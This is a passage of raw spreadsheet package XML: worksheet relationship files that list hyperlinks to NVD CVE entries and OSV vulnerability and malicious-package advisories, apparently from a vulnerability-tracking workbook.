Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83609" TargetMode="External" Id="rId1619" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83611" TargetMode="External" Id="rId1620" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83612" TargetMode="External" Id="rId1621" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83613" TargetMode="External" Id="rId1622" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83614" TargetMode="External" Id="rId1623" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83615" TargetMode="External" Id="rId1624" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83616" TargetMode="External" Id="rId1625" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83617" TargetMode="External" Id="rId1626" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83618" TargetMode="External" Id="rId1627" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83619" TargetMode="External" Id="rId1628" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84303" TargetMode="External" Id="rId1629" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84363" TargetMode="External" Id="rId1630" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84364" TargetMode="External" Id="rId1631" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84365" TargetMode="External" Id="rId1632" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84367" TargetMode="External" Id="rId1633" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84368" TargetMode="External" Id="rId1634" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84369" TargetMode="External" Id="rId1635" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84370" TargetMode="External" Id="rId1636" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84373" TargetMode="External" Id="rId1637" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84375" TargetMode="External" Id="rId1638" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84376" TargetMode="External" Id="rId1639" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84378" TargetMode="External" Id="rId1640" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84379" TargetMode="External" Id="rId1641" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84380" TargetMode="External" Id="rId1642" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84381" TargetMode="External" Id="rId1643" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84382" TargetMode="External" Id="rId1644" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84445" TargetMode="External" Id="rId1645" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84452" TargetMode="External" Id="rId1646" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85061" TargetMode="External" Id="rId1647" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85062" TargetMode="External" Id="rId1648" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85063" TargetMode="External" Id="rId1649" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86477" TargetMode="External" Id="rId1650" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92595" TargetMode="External" Id="rId1651" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92596" TargetMode="External" Id="rId1652" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92597" TargetMode="External" Id="rId1653" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92598" TargetMode="External" Id="rId1654" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-26w7-cxv4-gfx2" TargetMode="External" Id="rId1655" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-2q42-4q24-7rgv" TargetMode="External" Id="rId1656" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-2xp9-vwfh-vxw4" TargetMode="External" Id="rId1657" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16045" TargetMode="External" Id="rId1658" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16042" TargetMode="External" Id="rId1659" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-4qhr-qf46-fcrx" TargetMode="External" Id="rId1660" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-57v5-wqx3-cgj4" TargetMode="External" Id="rId1661" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16047" TargetMode="External" Id="rId1662" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16046" TargetMode="External" Id="rId1663" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16043" TargetMode="External" Id="rId1664" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-j95f-988m-3j2f" TargetMode="External" Id="rId1665" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-mqvm-gmc4-6rv2" TargetMode="External" Id="rId1666" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-q72m-f2r4-w4cw" TargetMode="External" Id="rId1667" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-rgj7-g3m4-5g8c" TargetMode="External" Id="rId1668" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-v3f6-m9j2-437p" TargetMode="External" Id="rId1669" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16048" TargetMode="External" Id="rId1670" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16049" TargetMode="External" Id="rId1671" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16050" TargetMode="External" Id="rId1672" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16051" TargetMode="External" Id="rId1673" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16052" TargetMode="External" Id="rId1674" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16056" TargetMode="External" Id="rId1675" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16057" TargetMode="External" Id="rId1676" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16058" TargetMode="External" Id="rId1677" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16199" TargetMode="External" Id="rId1678" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet5.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58704" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87491" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-25249" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19490" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20079" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42016" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42018" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67277" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75650" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76460" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76461" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85706" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86060" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86218" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87886" TargetMode="External" Id="rId15" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet6.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84869" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81963" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85880" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58704" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87491" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-25249" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19490" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20079" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42016" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42018" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67277" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75650" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76460" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76461" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85706" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86060" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86218" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87886" TargetMode="External" Id="rId18" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet7.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84869" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81963" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85880" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-60004" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44756" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82004" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12645" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12646" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12647" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12650" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19232" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-26084" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48273" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78234" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86464" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12744" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12745" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28606" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49921" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58240" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58822" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61516" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66302" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67631" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67643" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68839" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69276" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69408" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69431" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69463" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69491" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69493" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69496" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69525" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69579" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69586" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69590" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69595" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69715" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69730" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69768" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69769" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69819" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69824" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69829" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69845" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69910" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70296" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71374" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71376" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71377" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72979" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72982" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72983" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73009" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73010" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73025" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77089" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77092" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77098" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77493" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78445" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78509" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78510" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79569" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79570" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79574" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79576" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79577" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65669" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81376" TargetMode="External" Id="rId71" 